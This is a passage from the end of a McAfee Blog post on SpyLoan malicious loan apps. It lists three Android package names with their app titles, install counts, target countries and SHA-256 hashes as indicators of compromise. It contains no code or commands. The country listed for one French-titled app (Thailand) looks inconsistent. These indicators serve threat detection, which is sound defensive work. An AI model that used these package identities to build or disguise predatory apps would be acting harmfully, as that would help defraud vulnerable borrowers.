    com.credito.iprestamos.dinero.en.linea.chile IPréstamos: Rápido Crédito 100K Chile 45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2
    com.conseguir.sol.pe ConseguirSol-Dinero Rápido 100K Peru 79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48
    com.pret.loan.ligne.personnel ÉcoPrêt Prêt En Ligne 50K Thailand 27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e

     

    The post SpyLoan: A Global Threat Exploiting Social Engineering appeared first on McAfee Blog.

    ❌